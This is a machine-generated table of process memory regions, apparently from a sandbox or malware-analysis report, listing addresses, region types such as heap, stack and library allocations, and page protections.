1ABEDE84000
|
heap
|
page read and write
|
||
|
1B6E0440000
|
heap
|
page read and write
|
||
|
2B4BBE60000
|
heap
|
page read and write
|
||
|
1B6E22F3000
|
trusted library allocation
|
page read and write
|
||
|
2536855F000
|
heap
|
page read and write
|
||
|
2536A730000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8AF000
|
trusted library allocation
|
page read and write
|
||
|
EBD02FE000
|
stack
|
page read and write
|
||
|
1B6FA620000
|
heap
|
page execute and read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
EBD017F000
|
stack
|
page read and write
|
||
|
1D5CB48C000
|
heap
|
page read and write
|
||
|
54FE3FA000
|
stack
|
page read and write
|
||
|
54FDE7E000
|
stack
|
page read and write
|
||
|
EBCF9DE000
|
stack
|
page read and write
|
||
|
1D5CB45B000
|
heap
|
page read and write
|
||
|
1ABD4175000
|
heap
|
page read and write
|
||
|
25EA9FE000
|
unkown
|
page read and write
|
||
|
2536A556000
|
heap
|
page read and write
|
||
|
CB278FE000
|
stack
|
page read and write
|
||
|
1D5D0FF0000
|
trusted library allocation
|
page read and write
|
||
|
1ABD6634000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
1ABD59A0000
|
heap
|
page execute and read and write
|
||
|
1D5D0AE0000
|
heap
|
page read and write
|
||
|
1ABD3F0D000
|
heap
|
page read and write
|
||
|
1D5D0AF0000
|
trusted library allocation
|
page read and write
|
||
|
54FF14E000
|
stack
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1D5CBC00000
|
heap
|
page read and write
|
||
|
1ABEDE34000
|
heap
|
page read and write
|
||
|
1D5D0F70000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB413000
|
heap
|
page read and write
|
||
|
1D5D0A4F000
|
heap
|
page read and write
|
||
|
7FFD9B68C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ABEE18D000
|
heap
|
page read and write
|
||
|
1ABD6040000
|
trusted library allocation
|
page read and write
|
||
|
25369F30000
|
heap
|
page read and write
|
||
|
1B6FA821000
|
heap
|
page read and write
|
||
|
25368440000
|
heap
|
page read and write
|
||
|
EBD01FE000
|
stack
|
page read and write
|
||
|
8F83CFE000
|
stack
|
page read and write
|
||
|
1D5CB3B0000
|
heap
|
page read and write
|
||
|
8F83DFE000
|
stack
|
page read and write
|
||
|
1ABE5AE0000
|
trusted library allocation
|
page read and write
|
||
|
2536A6A0000
|
heap
|
page read and write
|
||
|
253018F6000
|
trusted library allocation
|
page read and write
|
||
|
1D5D1000000
|
heap
|
page read and write
|
||
|
1ABEDFE0000
|
heap
|
page execute and read and write
|
||
|
1B6E22F0000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA680000
|
heap
|
page read and write
|
||
|
25310085000
|
trusted library allocation
|
page read and write
|
||
|
8F83F7F000
|
stack
|
page read and write
|
||
|
1ABD4170000
|
heap
|
page read and write
|
||
|
1D5D09E6000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09F4000
|
trusted library allocation
|
page read and write
|
||
|
25369EA0000
|
heap
|
page read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
1D5CBF00000
|
trusted library allocation
|
page read and write
|
||
|
1ABD67FC000
|
trusted library allocation
|
page read and write
|
||
|
97A7E7E000
|
unkown
|
page readonly
|
||
|
54FE1FD000
|
stack
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1ABEDE29000
|
heap
|
page read and write
|
||
|
1ABD3E60000
|
heap
|
page read and write
|
||
|
1B6E3AFD000
|
trusted library allocation
|
page read and write
|
||
|
2531000F000
|
trusted library allocation
|
page read and write
|
||
|
E7D34FB000
|
stack
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
1ABD3E30000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
8F841BE000
|
stack
|
page read and write
|
||
|
212AD8F0000
|
heap
|
page read and write
|
||
|
2106968E000
|
heap
|
page read and write
|
||
|
1D5CB497000
|
heap
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
E7D2FFE000
|
stack
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5CB493000
|
heap
|
page read and write
|
||
|
1ABD5F8D000
|
trusted library allocation
|
page read and write
|
||
|
1B6E04D4000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
25368800000
|
heap
|
page read and write
|
||
|
1D5D0C80000
|
trusted library allocation
|
page read and write
|
||
|
1B6E02F0000
|
heap
|
page read and write
|
||
|
54FDF7D000
|
stack
|
page read and write
|
||
|
1ABD6630000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0D30000
|
remote allocation
|
page read and write
|
||
|
54FE17F000
|
stack
|
page read and write
|
||
|
253016E7000
|
trusted library allocation
|
page read and write
|
||
|
8F8423B000
|
stack
|
page read and write
|
||
|
EBCFE7E000
|
stack
|
page read and write
|
||
|
1D5CBC02000
|
heap
|
page read and write
|
||
|
25301BAF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB502000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0AC3000
|
heap
|
page read and write
|
||
|
1B6E1F00000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4FE000
|
heap
|
page read and write
|
||
|
1B6E1EC0000
|
heap
|
page read and write
|
||
|
7FFD9B60B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B670000
|
trusted library allocation
|
page read and write
|
||
|
25310011000
|
trusted library allocation
|
page read and write
|
||
|
54FE0FE000
|
stack
|
page read and write
|
||
|
7FFD9B5D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
1B6F2799000
|
trusted library allocation
|
page read and write
|
||
|
8F83FFE000
|
stack
|
page read and write
|
||
|
2536A508000
|
heap
|
page read and write
|
||
|
1D5D0D30000
|
remote allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
1ABD417B000
|
heap
|
page read and write
|
||
|
253016CF000
|
trusted library allocation
|
page read and write
|
||
|
54FE47E000
|
stack
|
page read and write
|
||
|
1ABD5BE9000
|
trusted library allocation
|
page read and write
|
||
|
1B6E03D0000
|
heap
|
page read and write
|
||
|
25301A0A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page read and write
|
||
|
1B6E1F14000
|
heap
|
page read and write
|
||
|
1D5D0C80000
|
trusted library allocation
|
page read and write
|
||
|
EBD00FD000
|
stack
|
page read and write
|
||
|
7FFD9B67C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2536A5A0000
|
heap
|
page read and write
|
||
|
1ABD3E40000
|
heap
|
page read and write
|
||
|
1ABEDEF5000
|
heap
|
page read and write
|
||
|
EBD037B000
|
stack
|
page read and write
|
||
|
253684C0000
|
trusted library allocation
|
page read and write
|
||
|
1B6E0540000
|
heap
|
page read and write
|
||
|
25368529000
|
heap
|
page read and write
|
||
|
1D5CBD02000
|
heap
|
page read and write
|
||
|
2536857F000
|
heap
|
page read and write
|
||
|
1B6E253D000
|
trusted library allocation
|
page read and write
|
||
|
97A7D79000
|
stack
|
page read and write
|
||
|
54FDEFE000
|
stack
|
page read and write
|
||
|
E7D31FE000
|
stack
|
page read and write
|
||
|
1D5D09C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0980000
|
trusted library allocation
|
page read and write
|
||
|
2B4BA7C0000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1ABD40E0000
|
heap
|
page readonly
|
||
|
1ABEE157000
|
heap
|
page read and write
|
||
|
1B6FA780000
|
heap
|
page read and write
|
||
|
21069870000
|
heap
|
page read and write
|
||
|
1B6FA4E0000
|
heap
|
page read and write
|
||
|
7FFD9B5C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
25368532000
|
heap
|
page read and write
|
||
|
1D5CB4B7000
|
heap
|
page read and write
|
||
|
54FDBDE000
|
stack
|
page read and write
|
||
|
7FFD9B7AA000
|
trusted library allocation
|
page read and write
|
||
|
97A95FE000
|
stack
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA531000
|
heap
|
page read and write
|
||
|
1B6FA793000
|
heap
|
page read and write
|
||
|
25301C78000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5D0AF7000
|
heap
|
page read and write
|
||
|
2536A040000
|
heap
|
page execute and read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
1ABD5920000
|
trusted library allocation
|
page read and write
|
||
|
2536A59A000
|
heap
|
page read and write
|
||
|
1ABD3EA0000
|
heap
|
page read and write
|
||
|
1ABD3F01000
|
heap
|
page read and write
|
||
|
1ABD3F05000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
1B6E22B0000
|
heap
|
page read and write
|
||
|
1D5D0B0A000
|
heap
|
page read and write
|
||
|
1B6FA677000
|
heap
|
page execute and read and write
|
||
|
1D5D0992000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA4B0000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
212AD830000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5CBD00000
|
heap
|
page read and write
|
||
|
25369E53000
|
trusted library allocation
|
page read and write
|
||
|
54FDFFE000
|
stack
|
page read and write
|
||
|
1ABEE010000
|
heap
|
page read and write
|
||
|
1B6E2331000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
8F83C7D000
|
stack
|
page read and write
|
||
|
1D5CB440000
|
heap
|
page read and write
|
||
|
1ABD5AEF000
|
trusted library allocation
|
page read and write
|
||
|
2536A4DB000
|
heap
|
page read and write
|
||
|
1ABD6623000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
8F83EFE000
|
unkown
|
page read and write
|
||
|
1D5CB47B000
|
heap
|
page read and write
|
||
|
1D5CB4A5000
|
heap
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5D4000
|
trusted library allocation
|
page read and write
|
||
|
1B6E04DC000
|
heap
|
page read and write
|
||
|
212ADC80000
|
heap
|
page read and write
|
||
|
1D5D0CE0000
|
trusted library allocation
|
page read and write
|
||
|
1D5CBD04000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09A8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B2000
|
trusted library allocation
|
page read and write
|
||
|
1B6E3B11000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77A000
|
trusted library allocation
|
page read and write
|
||
|
1ABD5BF0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0AE0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09D4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
2536A5C0000
|
heap
|
page read and write
|
||
|
1ABD5C26000
|
trusted library allocation
|
page read and write
|
||
|
25301C74000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB474000
|
heap
|
page read and write
|
||
|
97A797E000
|
stack
|
page read and write
|
||
|
97A7777000
|
stack
|
page read and write
|
||
|
21069850000
|
heap
|
page read and write
|
||
|
CB2758A000
|
stack
|
page read and write
|
||
|
CB27FFE000
|
stack
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ABD5AD1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B676000
|
trusted library allocation
|
page read and write
|
||
|
8F83AFE000
|
stack
|
page read and write
|
||
|
25300C2E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
|
54FE379000
|
stack
|
page read and write
|
||
|
210698D4000
|
heap
|
page read and write
|
||
|
1B6FA7FB000
|
heap
|
page read and write
|
||
|
1B6F27A8000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4B7000
|
heap
|
page read and write
|
||
|
EBCFFFF000
|
stack
|
page read and write
|
||
|
8F83D7E000
|
stack
|
page read and write
|
||
|
E7D32FE000
|
stack
|
page read and write
|
||
|
7FFD9B710000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
54FDB95000
|
stack
|
page read and write
|
||
|
25368480000
|
heap
|
page read and write
|
||
|
25368420000
|
heap
|
page read and write
|
||
|
7FFD9B5F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
CB27BFF000
|
stack
|
page read and write
|
||
|
2536A057000
|
heap
|
page read and write
|
||
|
1D5D0990000
|
trusted library allocation
|
page read and write
|
||
|
1B6E24B1000
|
trusted library allocation
|
page read and write
|
||
|
1B6F2662000
|
trusted library allocation
|
page read and write
|
||
|
1ABEDFC0000
|
heap
|
page execute and read and write
|
||
|
7DF493890000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5CB517000
|
heap
|
page read and write
|
||
|
1B6E26E5000
|
trusted library allocation
|
page read and write
|
||
|
CB281FC000
|
stack
|
page read and write
|
||
|
1B6F24B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page execute and read and write
|
||
|
EBD007E000
|
stack
|
page read and write
|
||
|
253016E9000
|
trusted library allocation
|
page read and write
|
||
|
97A8D7B000
|
stack
|
page read and write
|
||
|
1ABD40B0000
|
trusted library allocation
|
page read and write
|
||
|
1B6E0520000
|
heap
|
page read and write
|
||
|
25EAC7F000
|
stack
|
page read and write
|
||
|
1ABD5BF3000
|
trusted library allocation
|
page read and write
|
||
|
8F83BFE000
|
stack
|
page read and write
|
||
|
1D5CB4B7000
|
heap
|
page read and write
|
||
|
2530022E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
25368614000
|
heap
|
page read and write
|
||
|
1ABEE3A0000
|
heap
|
page read and write
|
||
|
7FFD9B6A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6E1EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B62C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B6A0000
|
trusted library allocation
|
page read and write
|
||
|
25300083000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0B03000
|
heap
|
page read and write
|
||
|
1B6FA7C8000
|
heap
|
page read and write
|
||
|
7FFD9B5E0000
|
trusted library allocation
|
page read and write
|
||
|
EBD027E000
|
stack
|
page read and write
|
||
|
1D5CC240000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA855000
|
heap
|
page read and write
|
||
|
7FFD9B5EB000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09FC000
|
trusted library allocation
|
page read and write
|
||
|
1B6FA6A0000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0AF6000
|
heap
|
page read and write
|
||
|
2536A4D9000
|
heap
|
page read and write
|
||
|
1B6E3B21000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
97A827E000
|
unkown
|
page readonly
|
||
|
1B6E04F4000
|
heap
|
page read and write
|
||
|
212AD820000
|
heap
|
page read and write
|
||
|
1D5D0B1B000
|
heap
|
page read and write
|
||
|
1D5CBD13000
|
heap
|
page read and write
|
||
|
1ABEE14D000
|
heap
|
page read and write
|
||
|
1D5D0AEF000
|
heap
|
page read and write
|
||
|
1B6E3B1D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B771000
|
trusted library allocation
|
page read and write
|
||
|
1B6E24A0000
|
heap
|
page execute and read and write
|
||
|
CB280FE000
|
stack
|
page read and write
|
||
|
1ABD5B19000
|
trusted library allocation
|
page read and write
|
||
|
1B6E0479000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5CB3D0000
|
heap
|
page read and write
|
||
|
1D5CBBD1000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4A6000
|
heap
|
page read and write
|
||
|
EBCFF7E000
|
stack
|
page read and write
|
||
|
212AD99A000
|
heap
|
page read and write
|
||
|
1ABD40F0000
|
heap
|
page read and write
|
||
|
2536A751000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B686000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
253016D5000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB4A2000
|
heap
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
97A787E000
|
unkown
|
page readonly
|
||
|
1B6FA7A0000
|
heap
|
page read and write
|
||
|
1D5D0A33000
|
trusted library allocation
|
page read and write
|
||
|
253016F9000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0ABE000
|
heap
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0A61000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
1D5CB42B000
|
heap
|
page read and write
|
||
|
1D5D0B02000
|
heap
|
page read and write
|
||
|
1B6FA670000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6E3FF8000
|
trusted library allocation
|
page read and write
|
||
|
2B4BA400000
|
heap
|
page read and write
|
||
|
1D5D0A42000
|
heap
|
page read and write
|
||
|
1D5D0AE3000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
EBCFEFE000
|
stack
|
page read and write
|
||
|
25310001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5D0AF4000
|
heap
|
page read and write
|
||
|
1D5D0A1E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A1000
|
trusted library allocation
|
page read and write
|
||
|
CB27EFD000
|
stack
|
page read and write
|
||
|
1B6F24C0000
|
trusted library allocation
|
page read and write
|
||
|
1ABD3F46000
|
heap
|
page read and write
|
||
|
1D5D0A2E000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
1ABEDFE7000
|
heap
|
page execute and read and write
|
||
|
25369F35000
|
heap
|
page read and write
|
||
|
1D5D09DD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B690000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D5D0A21000
|
heap
|
page read and write
|
||
|
1B6FA846000
|
heap
|
page read and write
|
||
|
8F8407D000
|
stack
|
page read and write
|
||
|
54FF04E000
|
stack
|
page read and write
|
||
|
1D5D099E000
|
trusted library allocation
|
page read and write
|
||
|
2530170C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1ABE5B3A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1ABE5AD1000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0C60000
|
trusted library allocation
|
page read and write
|
||
|
253684E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A2000
|
trusted library allocation
|
page read and write
|
||
|
2B4BA408000
|
heap
|
page read and write
|
||
|
1B6E04E0000
|
heap
|
page read and write
|
||
|
25EA979000
|
stack
|
page read and write
|
||
|
54FF0CD000
|
stack
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
25369F80000
|
heap
|
page execute and read and write
|
||
|
1D5CBD1A000
|
heap
|
page read and write
|
||
|
1D5CB4AB000
|
heap
|
page read and write
|
||
|
54FE57E000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6A6000
|
trusted library allocation
|
page read and write
|
||
|
1ABEE1A9000
|
heap
|
page read and write
|
||
|
1D5CB4B1000
|
heap
|
page read and write
|
||
|
1B6E1EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6E1EF0000
|
heap
|
page readonly
|
||
|
97A8E7E000
|
unkown
|
page readonly
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
8F84C0E000
|
stack
|
page read and write
|
||
|
253016F5000
|
trusted library allocation
|
page read and write
|
||
|
21069670000
|
heap
|
page read and write
|
||
|
1ABD6610000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1ABD5AC0000
|
heap
|
page read and write
|
||
|
2536856D000
|
heap
|
page read and write
|
||
|
8F84C8E000
|
stack
|
page read and write
|
||
|
1ABEDE20000
|
heap
|
page read and write
|
||
|
2B4BA370000
|
heap
|
page read and write
|
||
|
1D5CB425000
|
heap
|
page read and write
|
||
|
25369FE7000
|
heap
|
page execute and read and write
|
||
|
1D5D0C90000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09D0000
|
trusted library allocation
|
page read and write
|
||
|
2536A55B000
|
heap
|
page read and write
|
||
|
1ABD5AC5000
|
heap
|
page read and write
|
||
|
1D5D0C70000
|
trusted library allocation
|
page read and write
|
||
|
8F83E7E000
|
stack
|
page read and write
|
||
|
1D5D0A30000
|
trusted library allocation
|
page read and write
|
||
|
253685A7000
|
heap
|
page read and write
|
||
|
1D5CB506000
|
heap
|
page read and write
|
||
|
1B6E3CE7000
|
trusted library allocation
|
page read and write
|
||
|
1D5D09B0000
|
trusted library allocation
|
page read and write
|
||
|
25368340000
|
heap
|
page read and write
|
||
|
1D5CB3E0000
|
heap
|
page read and write
|
||
|
1D5D0998000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0AC0000
|
heap
|
page read and write
|
||
|
54FE07B000
|
stack
|
page read and write
|
||
|
1D5D0970000
|
trusted library allocation
|
page read and write
|
||
|
54FE4FF000
|
stack
|
page read and write
|
||
|
1D5CB513000
|
heap
|
page read and write
|
||
|
E7D2AFA000
|
stack
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
EBD0D4E000
|
stack
|
page read and write
|
||
|
1D5D0CD0000
|
trusted library allocation
|
page read and write
|
||
|
1D5D0FE0000
|
trusted library allocation
|
page read and write
|
||
|
CB27CFF000
|
stack
|
page read and write
|
||
|
54FE278000
|
stack
|
page read and write
|
||
|
1D5D0A4A000
|
trusted library allocation
|
page read and write
|
||
|
1ABEDEA1000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
1ABD3EFF000
|
heap
|
page read and write
|
||
|
1ABEE16A000
|
heap
|
page read and write
|
||
|
2B4BA427000
|
heap
|
page read and write
|
||
|
1ABD5AE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
25368805000
|
heap
|
page read and write
|
||
|
1B6E0620000
|
heap
|
page read and write
|
||
|
54FE2F6000
|
stack
|
page read and write
|
||
|
25369E50000
|
trusted library allocation
|
page read and write
|
||
|
2B4BA3A0000
|
heap
|
page read and write
|
||
|
7FFD9B5DD000
|
trusted library allocation
|
page execute and read and write
|
There are 586 hidden memdumps, click here to show them.